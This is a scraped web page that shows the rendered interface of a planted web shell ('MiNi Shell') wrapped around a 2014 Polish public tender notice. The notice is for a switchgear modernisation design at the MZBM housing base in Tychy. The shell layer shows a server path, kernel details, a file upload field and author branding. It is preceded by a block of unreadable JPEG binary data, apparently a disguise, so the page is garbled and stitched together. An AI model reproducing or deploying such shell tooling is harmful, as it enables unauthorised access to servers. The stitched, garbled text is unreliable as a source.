JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140821/278404-N-2014.html

<p class="kh_header"><b>Tychy: OPRACOWANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO NA MODERNIZACJĘ 
     ROZDZIELNI GŁÓWNEJ  Z PÓŁPOŚREDNIM UKŁADEM POMIAROWYM ORAZ 
     DOPOSAŻENIE ROZDZIELNI W UKŁAD  DO KOMPENSACJI MOCY BIERNEJ  
     NA TERENIE BAZY MZBM PRZY UL. FILARETÓW 31 W TYCHACH</b><br>
<b>Numer ogłoszenia: 278404 - 2014; data zamieszczenia: 21.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO NA MODERNIZACJĘ 
     ROZDZIELNI GŁÓWNEJ  Z PÓŁPOŚREDNIM UKŁADEM POMIAROWYM ORAZ 
     DOPOSAŻENIE ROZDZIELNI W UKŁAD  DO KOMPENSACJI MOCY BIERNEJ  
     NA TERENIE BAZY MZBM PRZY UL. FILARETÓW 31 W TYCHACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie projektu budowlano-wykonawczego na  
         modernizację rozdzielni głównej z półpośrednim układem pomiarowym oraz doposażenie 
         rozdzielni w układ do kompensacji mocy biernej w obiekcie zlokalizowanym na terenie bazy 
         Miejskiego Zarządu Budynków Mieszkalnych w Tychach - zgodnie z warunkami 
         modernizacji ROZDZIELNI GŁÓWNEJ  RG  podanymi przez TAURON DYSTRYBUCJA S.A.  
Oddział w Gliwicach, ul. Portowa 14a, 44-100 Gliwice oraz pełnienie nadzoru autorskiego 
w trakcie realizacji robót.


2.   Opracowanie powinno obejmować, co najmniej:
   1)  Dokumentację projektową opracowaną zgodnie z rozporządzeniem Ministra Infrastruktury  
        z dnia 2.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 
        specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu 
        funkcjonalno-użytkowego z dnia 2.09.2014  r. (Dz. U. Nr 202, poz. 2072) tj. z dnia 
        10 05. 2013 r.(Dz. U.  z 2013 r.  poz. 1129)                           
   2)  Opis stanu istniejącego;
   3)  Opis stanu projektowanego z uwzględnieniem m.in.:
         -  konstrukcji projektowanej tablicy licznikowej, lokalizacją układu, wyszczególnieniem 
             funkcji i typu projektowanych urządzeń i aparatów;
         -  informację nt. maksymalnej wartości mocy umownej ( wartość mocy umownej nie może  
             być większa od wartości mocy przyłączeniowej określonej w Warunkach Przyłączenia);
         -  Informację o wyborze taryfy rozliczeniowej;
         -  empiryczne obliczenia techniczne, w tym dobór wtórnych obwodów pomiarowych, 
             dobór przekładni przekładników pomiarowych, dobór pozostałych parametrów 
             znamionowych, moce rozdzielni/ uzwojeń, etc.,
         -  zestawienie materiałów;
         -  schematy rysunki np.: jednokreskowy zasilania, rzutu pomieszczeń i lokalizacji 
             elementów układu pomiarowego, trasy obwodów wtórnych, elewacji rozdzielni, elewacji 
             tablicy licznikowej, montażowe
    4)  Załączniki:
         Wśród załączników opracowania niezbędne są kserokopie dokumentów takich jak warunki   
         przyłączenia potwierdzające granice własności i wartości przyznanej mocy 
         przyłączeniowej, kserokopia podpisanej Umowy o Przyłączenie, ewentualnie kserokopia 
         aktualnej Umowy kompleksowej sprzedaży energii elektrycznej i usług dystrybucji, 
         ewentualnie kserokopie dotychczasowej korespondencji w tym  zakresie      
   5)  Specyfikację techniczną wykonania i odbioru robót budowlanych uwzględniającą nazwy 
        i kody: grup, klas oraz kategorii robót określonych w rozporządzeniu (WE) nr 213/2008 z 
        dnia 28.11.2007r. w sprawie Wspólnego Słownika zamówień;
   6)  Przedmiar robót w kolejności technologicznej zawierający ilość jednostek przedmiarowych 
        robót wynikających z dokumentacji projektowej;
   7)  Kosztorys inwestorski;
   8)  uzgodnienie projektu budowlano -wykonawczego z TAURON DYSTRYBUCJA S.A. 
        Oddział w Gliwicach, przy ul. Portowej 14a w jednym egzemplarzu wersji papierowej
        przed rozpoczęciem procesu inwestycyjnego;
  9)   ilość egzemplarzy:  4 kpl w formie papierowej  + CD (1 kpl w wersji elektronicznej w 
        formacie PDF);	
10)    materiały wskazane w projekcie winny posiadać deklaracje zgodności z Polską Normą lub 
         Polską Normą z europejską aprobatą techniczną;
4.	Wykonawca zapewni nadzór autorski w trakcie realizacji robót. 
5.	Dokumentację należy opracować zgodnie z obowiązującymi normami i przepisami, m.in.:
- rozporządzeniem Ministra Infrastruktury  z dnia 2.09.2004r. w sprawie szczegółowego         zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego z dnia 2.09.2014  r. (Dz. U. Nr 202, poz. 2072) tj. z dnia 10 05. 2013 r.(Dz. U. z 2013 r. poz. 1129)
-  Ustawą z dnia 10.04.1997r. Prawo energetyczne (Dz. U. z 2012r. poz. 1059)
-  Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie z późn. zm. 

(Dz. U. z: 2002 r. Nr 75, poz. 690;  2003 r. Nr 33, poz. 270;  2004 r. Nr 109, poz. 1156;  2008 r. Nr 201, poz.1238; 2008 r. Nr 228, poz. 1514;  2009 r. Nr 56, poz. 461; 2010 r. Nr 239, poz. 1597, 2012 r. Nr 220, poz. 1289 , 2013 r. Nr 152 poz. 926);    
6.	Wykonawca zobowiązuje się do przeniesienia na Zamawiającego autorskich praw majątkowych do opracowanej dokumentacji w zakresie, w jakim przeniesienie jest możliwe, na wszystkich polach eksploatacji, o których mowa w art. 50 ustawy o prawie autorskim i prawach pokrewnych, a także innych, na których materiały te mogą być wykorzystywane. 
     Przeniesienie autorskich praw majątkowych do opracowanej dokumentacji nastąpi w dniu 
     zrealizowania przedmiotu umowy i podpisania protokołu zdawczo-odbiorczego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.31.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
   zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania
    wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga 
    złożenia następujących dokumentów: 

  1) wykazu wykonanych, a przypadku świadczeń okresowych lub ciągłych również            
      wykonywanych, głównych dostaw lub usług w okresie ostatnich trzech lat przed upływem           
         terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym 
         okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz 
         których dostawy lub usługi zostały wykonane oraz załączeniem dowodów, czy zostały 
         wykonane lub są wykonywane należycie.
   Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał                     
   z należytą starannością:
    -   co najmniej jedną usługę obejmującą swym zakresem opracowanie dokumentacji 
         projektowej na wykonanie instalacji elektrycznej.
         (usługa winna dotyczyć realizacji jednego zamówienia i być przedmiotem jednej umowy) 

   2)  Do wykazu należy dołączyć dowody, czy usługi zostały lub są wykonywane
        należycie. 
        Dowodami, o których mowa powyżej są:
a)	poświadczenie, z tym że  w odniesieniu do nadal wykonywanych dostaw lub usług 
    okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące 
    przed upływem terminu składania ofert
b) w przypadku zamówień na roboty budowlane - inne dokumenty -  jeżeli z uzasadnionych 
    przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać     
    poświadczenia, którym mowa w pkt 2a) 
c) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
    wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 2a).

        Wykonawca w miejsce poświadczeń, o których mowa w pkt 2) może przedłożyć inne        
        dokumenty potwierdzające , że usługi wskazane w wykazie zostały wykonane lub są 
        wykonywane należycie.

        Wykaz usług należy sporządzić wg wzoru druku stanowiącego załącznik nr 3 do SIWZ     

        (W przypadku podmiotów występujących wspólnie w/w warunki udziału musi spełniać  
         co najmniej jeden z wykonawców ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym 
   zakresie sposobu oceny spełniania warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
         osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP) 
         Zamawiający wymaga aby wykonawca wykazał, że dysponuje co najmniej jedną osobą 
         posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej 
         w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ.
2)	Wypełniony i podpisany formularz oferty cenowej -według wzoru druku stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
       1)  zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki 
            VAT;  
        2)  zmiany osoby pełniącej nadzór;
        3)  zmian personalnych, adresowych, formy prawnej stron umowy;
        4)  zmiana terminu realizacji przedmiotu umowy, w następstwie zmian będących 
             następstwem działań organów administracji, (np. opóźnienia w uzyskaniu uzgodnień, 
             decyzji administracyjnych dotyczących przedmiotu umowy);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach , Dział Techniczno -Eksploatacyny ul. Filaretów 31, kod 43-100 Tychy,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2014 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach, SEKRETARIAT -pokój nr 15, ul. Filaretów 31, kod 43-100 Tychy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com